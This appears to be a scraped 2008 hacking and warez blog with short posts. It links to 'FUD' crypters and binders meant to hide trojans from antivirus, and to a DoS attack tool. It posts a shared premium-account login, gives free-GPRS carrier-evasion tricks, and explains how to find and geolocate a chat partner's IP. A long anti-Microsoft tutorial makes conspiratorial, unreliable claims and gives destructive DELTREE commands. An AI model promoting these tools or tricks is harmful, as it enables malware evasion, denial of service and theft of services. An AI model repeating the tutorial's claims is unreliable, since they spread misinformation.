http://rapidshare.com/files/157490211/superhacks2008_www.dl4all.com.rar

WITHOUT YOUR PASSWORD, NOBODY CAN COPY YOUR FILES AWAY!!(REUPLOADED)

2008-11-28T00:29:00.000-08:00

AntiCopy Personal Edition is an useful software that provides complete protection against data theft from personal or laptop computers.

Worried about someone stealing your personal documents, or your contact list?

With Personal Edition, you are able to prevent the attachment of unauthorized portable storage devices, keep a log of all device use, and 'whitelist' your own frequently used devices.

AntiCopy Personal edition provides you with the confidence that your computer is shielded from data theft no matter where you are.

Download:

Download Link1
OR
Download Link2
OR
Download Link3
OR
Donload Link4

2008-11-28T00:28:00.000-08:00

GMAIL DRIVE:
WITH GIVES YOU A NEW THING TO STORE YOU FILE IN GMAIL DRIVE
THE COOL THING IN GOOGLE ONLY HERE YOU CAN NOT GET IT ANY SITE EVEN IN

Download

NemeSys cripTer 100(fud)

2008-11-26T10:21:00.000-08:00

scantime criptER make
your server trojans udt for antivirus

DOWNLOAD LINK
http://rapidshare.com/files/156532723/NemeSys_cripTer.rar.html

Simple DoS Attack Tool

2008-11-26T10:19:00.000-08:00

Simple DoS Tool

http://img145.imageshack.us/img145/333/screenshotzw4.png

Well I made a simple DoS tool.

[COLOR=Red]Download:[/COLOR]
http://rapidshare.com/files/160094510/SimpleDosTool.exe

FM on ur google talk

2008-11-26T10:02:00.001-08:00

Hi Guy's 'n' Gal's this is trick presently iam using this for listening FM

FM is on your GTalk now ( Teen Taal 110...,only hindi songs)

For this u need to follow these steps...,

1) add this id in ur GTalk: service@gtalk2voip.com
2) than add: 110@radio.gtalk2voip.com

After completion of these 2 steps
Then make a cal to 110@radio.gtalk2voip.com than u wil be directly connected to teen taal FM radio station

RAPID SHARE PREMIUM ACCOUNTS 100% WORK

2008-11-26T09:57:00.000-08:00

Another Working Premium Account
Login: 6337098
Password: r2sTVBZRkZ
Traffic left:10000 MB(+92 GB)
Expiration date:Tue, 2. Dec 2008
NOTE : REMOVE SPACE THEN WEB OPEN

Trace Indian Mobile Location & Operator

2008-11-14T00:34:00.001-08:00

http://trace.bharatiyamobile.com/

IP vIA YahOO cHattIng

2008-11-09T05:16:00.000-08:00

iP vIA YahOO cHattIng..>!aND LocaTioN trAciNg
iP vIA YahOO cHattIng..>!aND LocaTioN trAciNg
wElL......I dUnnO iF eVEry1 kNows tHIs ONe oR nOt......sO m pOstINg tHIs...aLL i fOUnd Is tHe sEndIng fILe mEthhoD eVErywhErE..sO m pOstINg thIS oNe..!
wEn cHatTin gOTo sTArt>>>>>>>>.rUN>>>>>>>>TYpE "cmd" wIthoUt Quotes
tHen TYpE "netstat -b" wIthoUt qUOteS
aNd hIt enteR....
tHe IP aDjaCent tO 5101 in tHe LocAl aDdrEsS Is tHe Ip oF tHE PErsOn wIth hOOm u r cHAttIng.>!
tHis iS bettTEr ThaN tHe sEndINg fIle aND GettINg IP MetHOd.....HErE u dOn"t NeeD tO seND a fILe...!

tHEn nOtE dAt ip aND SeArcH fOr iTs GEo-lOcatioN hErE.....
http://www.ip-adress.com/
tHis wIll nOt bE thE Pin-POinT pOsitIOn OF tHE PerSon"s hOme ......bUT jUst a rOUgH eStImatE tO amAzE uR fRnds..!
fOr TRacINg BSNL UseRs.....iT maY eVEn sHOw dIfF. cItY.....ExAmplE::::AS In mY cAse////If u Try tO locAte mY Ip wIth tHAt ......u"lL laNd In pUne oR sum oTher aDjaCent cItY ...!

iF u KNow tHIs ....nO cOmmenTS,....

Free IDEA GPRS Hack/Trick - Working in some states

2008-10-22T09:31:00.001-07:00

Thursday, October 16th, 2008

There are number of free airtel gprs tricks available but very few are available for idea or Vodafone. So here I m presenting another idea trick for free gprs and internet on your mobile phone. But as I always say these tricks don’t work for a long time as the service providers are now using better tracking systems and hence they block the proxies as soon as they come across them. So try this out and enjoy free idea gprs if it works for you.

One more thing that I will like to tell you all is that even the proxies are also area specific, so if you can’t run free gprs, you should try searching for new proxies. Before you get this trick working you must ensure the following criteria:

1. You balance must be between Rs.15 to Rs.20.
2. Send the activation message only once.
3. Always use proxy servers for opening any site.
4. For using internet from pc or laptop take care that you use smart browser to surf internet.

ALL IN ONE Crypter - Binder

2008-10-22T09:30:00.000-07:00

October 22nd, 2008

The crypter stub is 97% undetectable only 3 antiviruses can detect and the binder is 98% undetectable only 2 antiviruses can detect it.

Crypter info:
EOF Data
Encryption
Decryption
Execute file
Icon Change
RC4
After Crypt Pack File

Binder info:
many Files Bind
shellAPI
Execute save in .

Download Link: http://www.4shared.com/file/67951878/4ae843ec/All_in1.html

All about Telnet 101

2008-09-26T12:21:00.000-07:00

Don't use this for illegal stuff::

Introduction:

Telnet is used to connect to remote machines through emulation. This means that
it can connect to a server, any server instantly because of it's ability to emulate (copy)
remote computers.

Lets Start:

In Windows, Telnet can be found by going to Start -> Run and then typing telnet.
The application should then pop up. If you don't have Windows, there are many Telnet alternatives for mac, linux etc. Since I don't know any,search the internet for Telnet for Linux or Telnet for Mac and you should find something instantly.

If you have a PC and are using Windows 98/95, 2000, Me, or XP continue...

As you can see, Telnet has 4 menu options. These are Connect, Edit, Terminal, and Help.

If you click Connect, you should see more options. Here they are.

Connect:

Remote System..
Disconnect

Exit

Names of servers you have been on.

To connect to a server, click Remote System...

This will then take you to a dialog box that has these fields:

Hostname:
Port:
TermType:

There should also be a Connect button and a Cancel Button.

Lets go over these & what you should put in them.

-Hostname-

The Hostname can be the address of the website your going to be connecting to:

http://www.oreos.com

or it can be the IP address. Keep in mind that you can only connect to servers and not to clients (other PCs)

an IP Address looks like this:

210.111.23.45

-Port-

Port can bb either the port number you wanna connect to on the server (Port 80 is the Internet, Port 23 is Simple Mail Protocol then there are some more ports for different things..)

or you can keep it Telnet and see what happens.

-TermType-

TermType is the type of Terminal telnet will be acting like.
This doesn't matter most of the time, so you can keep it to default or try other ones if you want.

When you have all this set up, you can Click Connect & see what happens.

Note: Sometimes many servers don't like anon people just logging on, so be careful when logging onto servers, because sometimes it might be some big company that likes bullying people or just SOMEONE who likes bullying people and then they might want to find you or trace you or something and I know for a fact you don't need that happening.

Another Note: When you go to a server and type something, such as a login name or a password, you might not see anything even though you are typing. this is a feature that telnet or the other server uses. It's for some kind of safety measure.

Ok that's all for the Connect Menu, lets go over the Terminal menu.

The terminal menu should have 3 options:

Prefernces
Start Logging
Stop Logging.

-Prefernces-

If you go to this, a dialog box will come up with various options. Here, you can change the
text color & background color of the program, and you can enable Local Echo, which shows
you everything you've typed, Blinking cursor if you want the cursor to blink check it, if not uncheck, Block cursor if you want the cursor to be shown as a block, VT100 Arrows, don't worry about these they are useless, Buffer Size, this allows you to set the number of lines of text you want to be shown before the screen starts to scroll, The Terminal emualtion type, always have this set on the default unless you know what the second one is and you know what your doing.

-Start Logging-

This logs everything you do on Telnet in a log file on your computer.

-Stop Logging-

This will stop logging processes.

The Information Microsoft Hides on Your Computer

2008-09-26T12:18:00.002-07:00

Here are folders on your computer that Microsoft has tried hard to keep secret. Within these folders you will find two (major) things: Microsoft Internet Explorer has been logging all of the sites you have ever visited -- even after you've cleared your cache, and Microsoft's Outlook and Outlook Express has been logging ALL of your e-mail correspondence -- even after you've erased them from your trashbin. (This also includes all incoming and outgoing e-mail attachments.) And believe me, that's not even the half of it.
When I say that these files are hidden well, I really mean it. If you don't have any knowledge of DOS, then don't plan on finding these files on your own. I say this because some of these files will only be found in DOS while some of these folders can only be found in Windows Explorer. Additionally, there are some folders that will not be displayed by neither DOS nor Explorer -- but can only be found using a workaround. Basically what I am saying is if you didn't know these files existed then the chances of you running across them is slim to slimmer.
To give you an example of how sneaky this is, there are three hidden folders that may contain your name, address, phone, all the sites you've visited, every single e-mail you've sent/received, every attachment you've ever sent/received, everything you've searched for in a search engine, every filename you've downloaded, names of documents containing "sensitive" information, copies of all your cookies, full readable e-mail from your hotmail account, your PGP keys, and more.
Funny that Microsoft would make no mention of this on microsoft.com.
FORWARD:
I know there are some people out there that are already aware of some of the things I mention. I also know that most people are not. The purpose of this tutorial is teach people what is really going on with Microsoft's products and how to take control of their privacy again.
Thanks for reading.
INDEX
1. DEFINITIONS AND ACRONYMS
2. WHY YOU SHOULD ERASE THESE FILES
3. HOW TO ERASE THE FILES ASAP (Recommended for the non-savvy.)
3.1) If You Own Microsoft Internet Explorer
3.2) Clearing Your Registry
3.3) If You Own Outlook Express
3.4) Slack files
3.5) Keeping Microsoft Internet Explorer (Not recommended at all.)
4. STEP-BY-STEP GUIDE THROUGH YOUR HIDDEN FILES (For the savvy.)
5. A LOOK AT OUTLOOK
6. HOW MICROSOFT DOES IT
7. +S MEANS [S]ECRET NOT [S]YSTEM
8. THE TRUTH ABOUT FIND FAST
8.1) Removing Find Fast
9. HOW HARD MICROSOFT TRIED TO KEEP PEOPLE FROM FINDING ABOUT IT
10. FINAL NOTE AND CONTACT INFORMATION
10.1) Recommended reading
11. SPECIAL THANKS
12. REFERENCES
Coming Very Soon:
mailbox.pst
pstores
Related Windows Tricks.
Reflection of why they use alphanumeric folders (9J3X7QZF4.)
Everything you didn't want to know about Find Fast.
The NSA-Key.
The [Microsoft Update] button.
Why the temp folders aren't intended to be temporary at all.
What's in those .dbx files?

--------------------------------------------------------------------------------
1. DEFINITIONS AND ACRONYMS
Well, the best definition I have been able to come up with is the following:
I) A "really hidden" file/folder is one that cannot be seen in Windows Explorer after enabling it to view all files, cannot be seen in MS-DOS after receiving a directory listing, and cannot be searched through using the "Find" utility.
a) There is at least one workaround to enabling Explorer to see them.
b) There is at least one workaround to enabling MS-DOS to see them.
c) There is at least one workaround to enabling the "Find" utility to search through them.
d) They are hidden intentionally.
II) Distinguishes "really hidden" file/folders from just plain +h[idden] ones, such as your "MSDOS.SYS" or "Sysbckup" folder.
III) Distinguishes from certain "other" intended hidden files, such as a file with a name of "šŸëœx¥."
DOS = Disk Operating System
MSIE = Microsoft Internet Explorer
TIF = Temporary Internet Files (folder)
HD = Hard Drive
OS = Operating System

--------------------------------------------------------------------------------
2. WHY SHOULD I ERASE THESE FILES?
1) Besides the glaring privacy risks.
2) Besides the fact that Microsoft is keeping these logs intentionally. (For reasons I can only imagine.)
3) These files can take up huge amounts of disk space. I've personally inspected a computer with almost 200 megs of this stuff, so you can imagine how much this can slow your computer down. After following these instructions you will probably notice a great improvement in performance.

--------------------------------------------------------------------------------
3. HOW TO ERASE THE FILES ASAP
Step by step information on how to erase these files as soon as possible. This section is recommended for the non-savvy. Further explanation can be found in Section 4.0. Please note that following these next steps will erase all your cache files, all your cookie files, and all of your e-mail correspondence. If you use the offline content feature with MSIE, following these next steps will remove this as well.

--------------------------------------------------------------------------------
3.1. IF YOU OWN A COPY OF MICROSOFT INTERNET EXPLORER
1) Shut your computer down, and turn it back on.
2) While your computer is booting keep pressing the [F8] key until you are given an option screen.
3) Choose "Command Prompt Only" (This will take you to true DOS mode.)
4) When your computer is done booting, you will have a C:> followed by a blinking cursor. Type in this hitting enter after each line.

CDWINDOWSTEMPOR~1
DELTREE/Y CONTENT.IE5
(If that didn't work then type this:)

CDWINDOWSAPPLIC~1TEMPOR~1
DELTREE/Y CONTENT.IE5
(If that didn't work then type this:)

CDWINDOWSLOCALS~1TEMPOR~1
DELTREE/Y CONTENT.IE5
(If this still does not work, and you are sure you are using MSIE5, then please e-mail me. Finding the location of these is a mission, and I'd certainly like to know where else MSIE likes to hide its cache. I believe older versions of MSIE keep them under "c:windowscontent".)
5) This will take a ridiculous amount of time to process. The longer it takes, the more records Microsoft had stored about you. When it gets done erasing that folder, then type this:

CD
DELTREE/Y TEMP
DELTREE/Y WIN386.SWP
CD WINDOWS
DELTREE/Y COOKIES
DELTREE/Y TEMP
DELTRE/Y WIN386.SWP
DELTREE/Y HISTORY

--------------------------------------------------------------------------------
3.2. CLEARING YOUR REGISTRY
Reboot your computer and wait for Windows to load back up.
1) Drop to DOS ("Start" > "Program Files" > "MS-DOS Prompt") and type this at prompt:

regedit
2) Your Registry Editor will pop up. Go to "Edit" > "Find"
3) Type in "TypedURLs" and then hit [Find Next]. You will be taken to all the places you've typed in URLs manually. 4) Erase any URLs that you find. Do not erase the folders. (They will be called "01," "02," "03," etc...) Double click on them to make sure they are URLs. I found mine here:

HKEY_USERS/Default/Software/Microsoft/Internet Explorer/TypedURLs/
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypedURLs/
5) and while you're in here you might as well go here:

HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current
Version/Explorer/RemoteComputer/NameSpace/
{d6277990-4c6a-11cf-8d87-00aa0060f5b5}
6) Delete the {d6277990-4c6a-11cf-8d87-00aa0060f5b5} key. This will make the "Find: Files or Folders" utility perform searches much faster.

--------------------------------------------------------------------------------
3.3. IF YOU HAVE OUTLOOK OR OUTLOOK EXPRESS INSTALLED
1) Install another e-mail program like Eudora, or Pegasus Mail. Make sure everything is setup correctly.
2) Backup any e-mail that you wish to save. (Print them out, or forward them to another box.)
3) Uninstall Outlook.
Warning, this conveniently does not erase any e-mail correspondence. To double check drop back to your DOS prompt and type this:

dir *.mbx /s/p
dir *.mbx /s/p/ah
The files you are looking for are:
INBOX.MBX
OUTBOX.MBX
SENTIT~1.MBX
DELETE~1.MBX
DRAFTS.MBX
If these files come up they will be listed in either of these folders:

C:WindowsApplication DataMicrosoftOutlook ExpressMail
C:Program Filesinternet mail and news%USER%mail
(If the .mbx files are located anywhere else then you probably don't want to delete them since they aren't from outlook. If they are from outlook, however, then please e-mail me.)
Now type either of the following (depending on the location of your .mbx files). Remember, this will erase all your e-mail correspondence so backup what you want to keep by printing them out or forwarding them to another box. Hopefully by now you have already set up Eudora or Pegasus Mail.

CDWINDOWSAPPLIC~1MICROS~1OUTLOO~1
DELTREE/Y MAIL
or

CDPROGRA~1INTERN~1%USER%
(replace "%user%" with the proper name.)

DELTREE/Y MAIL

--------------------------------------------------------------------------------
3.4. SLACK FILES
As you may already know, deleting files only deletes the references to them. They are in fact still sitting there on your HD and can be easily recovered by anyone.

BCWipe is a nice program that will clear these files.
For you DOS buffs, there's a program called FileDust that got a 5 star rating on ZDNET, if that matters.
If you are using PGP then there is a "Freespace Wipe" option under PGPtools.
Norton Utilities has a nice filewiping utility.
You might want to check out Evidence Eliminator's 30 day trial. This is probably the best program as far as your privacy goes.

--------------------------------------------------------------------------------
3.5. KEEPING MICROSOFT INTERNET EXPLORER
If you insist on using Microsoft Internet Explorer then I strongly recommend that you check out at least one of these programs:

PurgeIE
Anonymizer Window Washer
Cache and Cookie Washer for IE
I have already tried and tested some other programs and you'd be surprised on how many of them DON'T pass the tests. For example, HistoryKiller 2001 claims it erases all the files, but don't count on it.

--------------------------------------------------------------------------------
4. STEP-BY-STEP GUIDE THROUGH YOUR HIDDEN FILES
This next section is for those of you who are more interested in learning the ins and outs of your computer. This section is intended for the savvy user.
1) First, drop to DOS and type this at prompt (in all lower-case):

c:windowsexplorer /e,c:windowstempor~1content.ie5
You see all those alphanumeric names listed under "content.ie5?" (left-hand side) That's Microsoft's idea of making this project as hard as possible. (Earlier versions of Internet Explorer simply called them "cache#.") These are your alphanumeric folders that MSIE has created to keep your cookies and cache. Write these names down. (They should look something like this: 6YQ2GSWF, QRMTKLWF, U7YHQKI4, 7YMZ516U, WQK6Z9UV, etc...) If you click on any of these folders then nothing will be displayed. Not because there aren't any files here, but because Windows Explorer has lied to you. If you want to view the contents of these alphanumeric folders you will have to do so in DOS. (Actually, there is a workaround that Skywalker taught me, but it's a little bit harder to explain. I promise to cover this tip in the next version.)
2) Restart in MS-DOS mode. (You must restart because windows has "locked" down some of the files.)
3) Type this in at prompt:

CDWINDOWSTEMPOR~1CONTENT.IE5
CD %alphanumeric%
(replace the "%alphanumeric%" with the first name that you just wrote down.)

DIR/P
Note: Not only are you in a folder that DOS claims does not exist, but you are now looking at cache/cookies that Windows Explorer claims do not exist.
These folders are directly responsible for the mysterious erosion of hard drive space you may have been noticing. Just a couple interesting things you can find in here:

Pictures from all those porn sites you've visited.
Other internet cache files completely wasting your disk space.
If you use Hotmail (or any webmail service) you can probably see some of your old messages laying around here. To see them for yourself, copy them into another directory and open them with your browser.
Retrieving your personal information from these cookies is a snap. For example if you've ever shopped at Amazon.com then there's access to your name and e-mail. If you're a user on Hollywood.com then there's your city, state, and zip. MP3.com keeps some goodies as well.
Feel free to check out all your alphanumeric folders, before going on to the next step.
5) Type this in:

CDWINDOWSTEMPOR~1CONTENT.IE5
EDIT /75 INDEX.DAT (or "EDIT /16 index.dat")
You will be brought to a blue screen with a bunch of binary.
6) Press and hold the [Page Down] button until you start seeing lists of URLs. These are all the sites that you've ever visited as well as a brief description of each. You'll notice it records everything you've searched for in a search engine in plain text, in addition to the URL.
7) When you get done searching around you can go to "File" > "Exit."
8) Next you'll probably want to erase these files by typing this:

DELTREE/Y C:WINDOWSTEMPOR~1
(replace "c:windowstempor~1" with the location of your TIF folder if different.)
This will take a seriously long time to process. Then go check out your History.
9) Type this:

CDWINDOWSHISTORYHISTORY.IE5
EDIT /75 INDEX.DAT (or "EDIT /16 index.dat")
You will be brought to a blue screen with more binary.
10) Press and hold the [Page Down] button until you start seeing lists of URLS again.
This is another recording of the sites you've visited. There also may be some other things in here. E-mail me if you find anything interesting. I will share with you a snippet of what I found in my index.dat file.

Client UrlCache
MMF Ver 5.2@
@ 3 yiâ
€
àOÐ ê:+0
0�
'
}*Á� 5.t
xt
59

MS6C:%

\DAVE'S
HD.TXT
MSIE5.
C:
Did you note the "C:" and "\DAVE'S HDMSIE5.TXT"?
"Dave" is the fictitious name that I use on my computer. "Dave's HD" is the name of my root folder on my LAN. "MSIE5.TXT" is the name of a text file that I've been saving on my computer. It contains research from THIS project that I've been working on. Mostly URLs and notes.
Do you see anything wrong with this picture? It took notice on a file on my HD, folks. MY HARD DRIVE. Not only that, but it is saving it in a folder that cannot be seen by neither DOS nor Windows Explorer. Is it a coincidence that this file was related to the research of this tutorial?
Obviously, my first suspicion was that Microsoft was scanning my HD and logging any "sensitive" information. In this case, my msie5.txt probably had something in it that Microsoft didn't like. To read more about my findings read "THE TRUTH ABOUT FIND FAST" in section 8.0.
1) If you're still with me, type this:
CDWINDOWSHISTORY
2) check out the mmXXX.dat files (and delete them), then type:

CDWINDOWSHISTORYHISTORY.IE5
CD MSHIST~1
EDIT /75 INDEX.DAT (or "EDIT /16 index.dat")
More URLs from your internet history. Note there are probably other mshist~x folders here. 3) You can repeat these steps for every occurrence of the mshistxxxxxxxx file.
4) By now you'll probably want to type in this:

CD WINDOWS
DELTREE/Y HISTORY
This is about it as far as I know. You may also want to take a look at your *.mbx files if you own Outlook. (dir *.mbx/s) More detailed information is covered in the next chapter.

--------------------------------------------------------------------------------
5. A LOOK AT OUTLOOK EXPRESS
Would you think twice about what you said if you knew it was being recorded? E-mail correspondence leaves a permanent record of everything you've said -- even after you've told Outlook to erase it. You are given a false sense of security sense you've erased it twice, so surely it must be gone. The first time Outlook simply moves it to your "Deleted Items" folder. The second time you erase it Outlook simply "pretends" it is gone. The truth is your messages are still being retained in a "really hidden folder."
Furthermore, as if that wasn't disturbing enough, Outlook Express also keeps records of EVERY SINGLE file attachment in an ENCRYPTED database. Can you believe this, folks?
For example, I attached this zip file and sent it to myself.

PK '…Ž*}�™ P AAAÀ�€ Öø)-8³PK +…Ž*8øM3 P
BBBÀ�€ ×ø%-8³PK .…Ž*ÄÖ.� P CCCÀ�€ Øø!-8³PK
2…Ž*² å` P DDDÀ�€ Ùø -8³PK '…Ž*}�™ P
AAAPK +…Ž*8øM3 P 1BBBPK
.…Ž*ÄÖ.� P bCCCPK 2…Ž*² å` P
"DDDPK ÄÄ
And it recorded this in both my inbox.mbx file and outbox.mbx file:

UEsDBBQAAAAIACeFjip9jZkaEAAAAFAAAAADAAAAQUFBrcCBAAAAAIAg1vgpljizAFBLAwQUAAAA
CAArhY4qOPhNMxAAAABQAAAAAwAAAEJCQq3AgQAAAACAINf4JZY4swBQSwMEFAAAAAgALoWOKsTW
Lp0QAAAAUAAAAAMAAABDQ0OtwIEAAAAAgCDY+CGWOLMAUEsDBBQAAAAIADKFjiqyEuVgEAAAAFAA
AAADAAAARERErcCBAAAAAIAg2fgdljizAFBLAQIUABQAAAAIACeFjip9jZkaEAAAAFAAAAADAAAA
AAAAAAEAIAAAAAAAAABBQUFQSwECFAAUAAAACAArhY4qOPhNMxAAAABQAAAAAwAAAAAAAAABACAA
AAAxAAAAQkJCUEsBAhQAFAAAAAgALoWOKsTWLp0QAAAAUAAAAAMAAAAAAAAAAQAgAAAAYgAAAEND
Q1BLAQIUABQAAAAIADKFjiqyEuVgEAAAAFAAAAADAAAAAAAAAAEAIAAAAJMAAABERERQSwUGAAAA
AAQABADEAAAAxAAAAAAA
Cheers to the first person to discover the algorithm.
Anyway, by now you are probably wishing you knew where these records were kept. Don't worry they're right here:

c:program filesinternet mail and news%user%mail*.mbx
(replace %user% with the name you use.)
Or, if you're lucky:

c:windowsapplication datamicrosoftoutlookmail*.mbx
I found it odd that the first time I installed outlook, my e-mail data was saved automatically into "internet mail and news." After I uninstalled and reinstalled, it changed its mind and put it into my "application data."
To erase these files simply type: (of course if you do this you will kill all of your e-mail messages, so backup what you want to keep.)

Deltree c:windowsintern~1%user%mail
or

Deltree c:windowsapplic~1micros~1outloo~1mail

--------------------------------------------------------------------------------
6. HOW MICROSOFT DOES IT
Ever wonder how Microsoft makes these folders invisible to both DOS and Windows Explorer? I was completely baffled by how Microsoft was accomplishing this since even using a DOS 6.2 boot disk wouldn't work for me. I was honestly pretty upset that the answer escaped me for so long, but after wondering around in the folders I finally figured it out.
The "desktop.ini" is a standard text file that can be added to any folder to customize certain aspects of the folder's behavior. In these cases, Microsoft utilized the desktop.ini file to make these files invisible. Invisible to Windows Explorer, invisible to DOS, and even invisible to the "Find" Utility (so you wouldn't be able to perform searches in these folders!)
Here are a couple examples:
Found in the c:windowstemporary internet filesdesktop.ini and the c:windowstemporary internet filescontent.ie5desktop.ini contains this text:

[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
Found in the c:windowshistorydesktop.ini and the c:windowshistoryhistory.ie5desktop.ini contains this text:

[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
CLSID={FF393560-C2A7-11CF-BFF4-444553540000}
The UICLSID line cloaks the folder in both DOS and Explorer. The CLSID line disables the "FIND" utility from searching through the folder. Additionally, it gives a folder the appearance of the "History" folder. (You'll know what I mean if you fiddle with them enough.)
Erasing these desktop.ini files will give DOS and Windows Explorer proper viewing functionality once again. The problem with erasing them is windows will reconstruct them on your next bootup. The workaround is to edit the desktop.ini files and remove everything except for the [.ShellClassInfo]. This will trick windows into thinking they have still covered their tracks, so they won't think to reconstruct them again.
By the way, if you erase these keys from your Registry it will not un-hide these folders. Still, I'm sure somebody could play with this enough to figure out a way to completely disable Microsoft from ever hiding files on your computer again.

--------------------------------------------------------------------------------
7. +S MEANS [S]ECRET NOT [S]YSTEM
Here are three easy true or false questions regarding DOS. Play along like you needed to know the answers to get your A+ certification.
1) True or false: Executing the dir/s command in root will display all the "normal" files and directories on your hard drive.
The correct answer is 'true.'
2) True or false: Executing the dir/s/ah command in root will display all the "hidden" files and directories on your hard drive.
Again, the correct answer is 'true.'
3) True or false: Executing the dir/s/as command in root will display all the "system" files and directores on your hard drive.
The correct answer is 'you wish.'
When DOS tries to get a list of the subdirectories of any +s[ystem] folder it hits a brick wall. Not only does this mean Microsoft has taken extra precautions to keep people from finding these files, but it defeats the whole purpose of the "/s" switch in the first place. Nice one.
In case you didn't understand, here's a small experiment that will show you what I mean.
Since the content.ie5 and history.ie5 subfolders are both located within a +s[ystem] folder, we will run the experinment with them. The proper command to locate them should be this:

CD
DIR *.IE5 /s/as
The problem is that you will receive a "No files found" error message.
This proves that all subfolders/files that are located within a system folder will not be listed. But believe me, it's there.
Now, the really interesting thing is that you (luckily) can get around this brick wall. That is, once you are in the system folder, then the brick wall no longer has an effect on the directory listings. For example:

CDWINDOWSTEMPOR~1
DIR *.IE5 /as
1 folder(s) found.
Oh good, now you can see them. (But only after you knew the exact location.) In other words, if you didn't know the folders existed then finding them would be almost impossible.

--------------------------------------------------------------------------------
8. THE TRUTH ABOUT FIND FAST
Have you ever wondered what that "Find Fast" program was under your control panel? I've spent about an hour on microsoft.com reading help files and I STILL have no clue of what it's good for. Here's the most informative snippet I found on microsoft.com.
"The Find Fast Indexer is a utility that builds indexes to speed finding documents using the Open and Open Office Documents commands in Microsoft Office programs, including Microsoft Outlook."
So what does that mean? Well, if you read it carefully you'll see that Microsoft never mentions that it will speed up your searches. In fact it has nothing to do with the "Find: Files or Programs" utility. I think what Microsoft is really trying to say is that when you go to "File" > "Open" under Microsoft Word, then your list of documents will be displayed quicker.
If that is what they are saying then it is a lie. I hope you don't think I am taking Microsoft's quote out of context here. I'm only trying to show you all the methods that Microsoft went through to make it appear that the Find Fast utility speeds up searches.
For example if you go to "Edit" (under Microsoft Word), you will notice there is a "Fast Find" icon next to it. (Binoculars icon.) This is usally a clear indication that it is related to the Find Fast program. However, if you re-read that quote, it doesn't mention anything about finding words "within" a document, but only the document itself. Here are some more quotes from Microsoft:
"The Find Fast Indexer tool tracks the location on the hard disk of all Microsoft Word for Windows documents by default. When one of these files is moved, the Find Faster Indexer tool updates its index."
"Indexes are used to make file searches faster in Office programs."
"The Find Fast Indexer is installed on your computer when you install Microsoft Office 97. Find Fast builds an index to speed up finding documents from the Open dialog box in Microsoft Office programs."
I wasn't able to find one single shred of evidence that it helped you "search" faster. Yet, Microsoft insisted on calling the program "Find Fast." THEN they decided to add the Find Fast icon next to the [Search Document], as if Find Fast had anything to do with searching the document.
So now do you think you know the truth?
What would you say if I told you that Find Fast was scanning and indexing every single file on your hard drive? Did you know that in Office 95, the Find Fast Indexer had an "exclusion" list comprised of .exe, .swp, .dll and other extensions, but the feature was eliminated? If you were a programmer, would you program Find Fast to index every single file, or just the ones with Office extensions?
Here are some other interesting facts:
Find Fast automatically loads on every boot (because it added to your Startup folder.)
If you have ever had problems with scandisk (restarting due to "disk writes."), it is because Find Fast was indexing your hard drive in the background.
Now here is a good example of the lengths Microsoft has gone through to keep people from finding out Find Fast indexes their hard drives. (Always good to have an alibi.) And I quote:
"When you specify the type of documents to index in the Create Index dialog box, Find Fast includes the document types that are listed in the following table.
Doc Type File Name Extension
Microsoft Office files All the Microsoft Excel, Microsoft Web documents PowerPoint, Microsoft Project, and Microsoft Word document types listed in this table. Microsoft Binder (.odb, .obt) and Microsoft Access (.mdb) files. Note that in .mdb files, only document properties are indexed.
Microsoft Excel workbooks .xl* files
Microsoft PowerPoint files .ppt (presentation), .pot (template), .pps (auto-running presentation) files
Microsoft Project files .mpp, .mpw, .mpt, .mpx, .mpd files
Microsoft Word documents .doc (document), .dot (template), .ht* (Hypertext Markup Language document), .txt (text file), .rtf (Rich Text Format) files
All files *.* files

Did you get that last part? If you were a wealthy man and you decided to buy every single car in the car lot, would you
a) Say, "I'll take the red ones, the blue ones, the silver ones, the white ones, the champagne ones, and all of them," or
b) "I'll take them all sir."
As you can see, they don't want people to realize that Find Fast is keeping an index of your entire hard drive. They walk around the car lot saying "I'll take the red ones, the blue ones, the silver ones,..."
I personally witnessed the Find Fast Indexer "creep" its way back into my Startup folder after I removed it. There's no possible way I could have done this on purpose. In fact the only way I could have done it is if I created a shortcut to Find Fast and then moved the shortcut into Startup manually. There's no option on the Find Fast program to add it to Startup.
Am I making this up? Did I imagine it? Well, even if I am, then that doesn't change the overwhelming amount of inconsistencies. For example:
1) Drop to DOS
2) CD
3) DIR FF*.* /AH (This will bring up a listing of ffast-related files.)
4) edit /75 %ff% (insert %ff% with any of the names that were listed.)
Notice the incredible amount of disk accesses to your "really hidden" "Temporary Internet Files" folder? What is the obsession that Find Fast has with these hidden folders, anyway?

--------------------------------------------------------------------------------
8.1. REMOVING THE FIND FAST PROGRAM
1) Reboot your computer in MS-DOS Mode.
2) Delete the FindFast.CPL file from c:windowssystem
3) Delete the shortcut under c:windowsstart menuprogramsstartup
4) Delete the FindFast.EXE file from c:progra~1micros~1office
Other related files that are safe to erase:
5) FFNT.exe, FFSetup.dll, FFService.dll, FFast_bb.dll, "c:>ff*.*"
Notice you will loose no functionality after erasing these files? Actually, you will gain functionality.

--------------------------------------------------------------------------------
9. HOW HARD MICROSOFT TRIED TO KEEP PEOPLE FROM FINDING ABOUT IT
In case the desktop.ini file wasn't enough proof. ("Whoops, we didn't know the desktop.ini file would turn folders invisible?") And in case you thought disabling DOS's "/s" switch for system folders was just a "bug." And in case you thought Microsoft disabled the Find utility from searching through the folders just to save you time (uh huh) -- then feel free to check out this thread on the Hackers.com BBS.

--------------------------------------------------------------------------------
10. FINAL NOTE AND CONTACT INFO
This tutorial is being updated ALL THE TIME. If you have any input then please e-mail me so I can compile it into future versions. You may have noticed many requests to contact me throughout this tutorial. This is because I am very eager to find out everything there is to know about this. But just so I am not swamped with old updates, please make sure you are reading the most current version.
My e-mail address is located below. Although it may not be done in a timely fasion, I always reply to all of my e-mail. By the way, I deleted my PGP due to security reasons. So if you want to contact me privately, then I'm sure we can work out something else.
Thanks for reading, -- The Riddler
e-mail: mailto:ther1ddler@fuckmicrosoft.com?Subject=Feedback from fuckMicrosoft.com Article
hangout: http://www.hackers.com/bulletin/

--------------------------------------------------------------------------------
10.1. RECOMMENDED READING
And if you aren't already paranoid enough here's some sites/articles that I definitely reccomend:
http://www.theregister.co.uk/content/4/18002.html
http://www.findarticles.com/m0CGN/3741/55695355/p1/article.jhtml
http://www.mobtown.org/news/archive/msg00492.html
http://194.159.40.109/05069801.htm
http://www.yarbles.demon.co.uk/mssniff.html
http://www.macintouch.com/o98security.html
http://www.theregister.co.uk/content/archive/3079.html
